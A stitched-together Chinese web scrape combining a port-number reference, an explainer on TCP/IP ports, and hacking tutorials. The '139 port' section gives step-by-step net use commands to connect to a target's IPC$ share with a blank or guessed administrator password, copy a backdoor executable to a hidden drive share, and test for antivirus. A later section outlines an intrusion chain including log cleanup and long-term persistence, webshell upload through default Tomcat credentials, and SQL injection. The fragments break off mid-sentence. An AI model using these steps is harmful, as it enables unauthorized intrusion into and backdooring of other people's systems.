端口:23 服务:Telnet 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。 端口:25 服务:SMTP

139端口入侵简易教程

139端口入侵简易教程; net use \\192.168.0.1\ipc$ "" /user:administrator 提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。 首先,连接的命令是: net<空格>use<空格>\\IP地址\ipc$<空格>密码<空格>/user:用户名 假设我要连接的目标IP地址是:192.168.1.11,用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的: net use \\192.168.1.11\ipc$ 123456 /user:google 如果连接成功,那么系统会提示"命令成功完成"! 空密码是这样的: 如果密码是空的,那就在原先输入密码的地方以""代替。 开始查看权限: 查看登录后用户权限的方法很简单,只要给目标系统传个文件就可以了,如果传诵成功,那么一般都是系统管理员权限了,如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的: copy<>文件绝对路径<>\\IP地址\文件目标路径 比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下: copy c:\a.exe \\192.168.1.11\d$ 要注意"$"符,那是隐藏共享盘的表示符,如果对方的共享盘不是隐藏的,就不需要"$"符了。如果命令执行成功,系统同样会提示"已复制1 个文件" 小技巧: 再次复制相同文件至相同路径,以检测是否存在杀毒软件!!! 如果系统提示“改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上,没有被杀毒软件查杀(一般发送过去的都是后门程序只类的东西,只有系统安装了杀毒软件都会被杀掉)。如果没有提示,则说明安装了杀毒软件。

网络协议端口号详解

协议端口号详解 计算机"端口"是英文port的译义,可以认为是计算机与外界通讯交流的出口。其中硬件领域的端口又称接口,如:USB端口、串行端口等。软件领域的端口一般指网络中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和I/O(基本输入输出)缓冲区。 在网络技术中,端口(Port)有好几种意思。集线器、交换机、路由器的端口指的是连接其他网络设备的接口,如RJ-45端口、Serial端口等。我们这里所指的端口不是指物理意义上的端口,而是特指TCP/IP协议中的端口,是逻辑意义上的端口。 那么TCP/IP协议中的端口指的是什么呢?如果把IP地址比作一间房子,端口就是出入这间房子的门。真正的房子只有几个门,但是一个IP地址的端口可以有65536(即:256×256)个之多!端口是通过端口号来标记的,端口号只有整数,范围是从0 到65535(256×256)。 在Internet上,各主机间通过TCP/TP协议发送和接收数据报,各个数据报根据其目的主机的ip地址来进行互联网络中的路由选择。可见,把数据报顺利的传送到目的主机是没有问题的。问题出在哪里呢?我们知道大多数操作系统都支持多程序(进程)同时运行,那么目的主机应该把接收到的数据报传送给众多同时运行的进程中的哪一个

呢?显然这个问题有待解决,端口机制便由此被引入进来。 本地操作系统会给那些有需求的进程分配协议端口(protocal port,即我们常说的端口),每个协议端口由一个正整数标识,如:80,139,445,等等。当目的主机接收到数据报后,将根据报文首部的目的端口号,把数据发送到相应端口,而与此端口相对应的那个进程将会领取数据并等待下一组数据的到来。说到这里,端口的概念似乎仍然抽象,那么继续跟我来,别走开。 端口其实就是队,操作系统为各个进程分配了不同的队,数据报按照目的端口被推入相应的队中,等待被进程取用,在极特殊的情况下,这个队也是有可能溢出的,不过操作系统允许各进程指定和调整自己的队的大小。 不光接受数据报的进程需要开启它自己的端口,发送数据报的进程也需要开启端口,这样,数据报中将会标识有源端口,以便接受方能顺利的回传数据报到这个端口。 端口详解 在开始讲什么是端口之前,我们先来聊一聊什么是 port 呢?常常在网络上听说『我的主机开了多少的 port ,会不会被入侵呀!?』或者是说『开那个 port 会比较安全?又,我的服务应该对应什么 port 呀!?』呵呵!很神奇吧!怎么一部主机上面有这么多的奇怪的 port 呢?这个 port 有什么作用呢?! 由于每种网络的服务功能都不相同,因此有必要将不同的封包送给不

电脑常用端口端口大全

电脑常用端口端口大全 一、端口大全 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。 端口:1 服务:tcpmux 说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX 等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER 利用IP欺骗可以发动dos攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle dos攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 端口:21 服务:ftp 说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的ftp服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible ftp、webEx、WinCrash和Blade Runner所开放的端口。 端口:22 服务:Ssh 说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。 端口:23 服务:TelNET 说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny TelNET Server就开放这个端口。 端口:25 服务:SMTP 说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为

入侵思路-攻击篇-常见WEB攻击

第一部分常见WEB攻击 一.按传统攻击分类,大概有以下几阶段 1.漏洞探察,端口探测 2.攻击外部入口 3.架设连接内部网络的程序 4.攻击内部网络 5.攻击内部主机或网络,建立外连通道 6.扩大内部网络攻击渗透的范围,下载传输内部网络的资料 7.固定内部网络的战果,建立长期入侵通道 8.清理入口,内部网络留下的工作日志 9.尽量是内部网络和外部入口设备和机器保持网络管理员看起来的正常,减少网络传输的频率,保证能长期占领该网络 二.下面就直接讲入侵的传统手法 1.常见的就是扫描该网络的出口,找到映射出来的端口 2.弱口令猜解,溢出,WEB渗透的办法,另外还有一些网络欺骗的手段,最后就是社会工程的方法搞定外部入口 3.现在网络基本上的外部入口不会有特别的端口,常见协议有FTP,SSH,POP3,SMTP,WEB,telnetd,还有某些协议代理的端口,所以基本可用的方法首先就是溢出,大家可以去看看0DAY,实在没有就去找找发布过的1DAY,但是一般的没有太大的成功几率.

我这里谈的攻击,主要谈谈通过WEB的渗透办法 三.传统的WEB漏洞 3.1. 目录浏览 通过浏览地址http://IP/docquery,可以查看到docquery目录下的所有文件的名称 3.2. 备份页面暴源码

管理员为了维护的方便,会在web页面的目录保存页面编辑时候的备份文件,或者是由于某些编辑软件自动生成bak为扩展名的页面文件,导致在浏览器直接可以查看页面文件源代码 3.3. 默认管理页面漏洞 比如

安装的是tomcat,存在默认管理页面http://IP/admin/index.jsp,并且没有更改默认的登陆帐号的密码,使用默认的账号密码可以登录。通过上传木马可以轻易就获得WEBSHELL,由于tomcat以服务运行,因此直接获得system权限 3.4 SQL 注入 比如,http://IP/Page.jsp?City=天津 该链接存在注入漏洞,参数city附近语法不严格导致产生注入点,可以使用数据库猜解工具得到数据库中的数据。 比如, 漏洞测试网站一:云南黑客联盟 申请一个用户,登陆,然后发表文章,D:YNHACKUSER../inc/cls_main.asp网站路径管理员数小于5,管理

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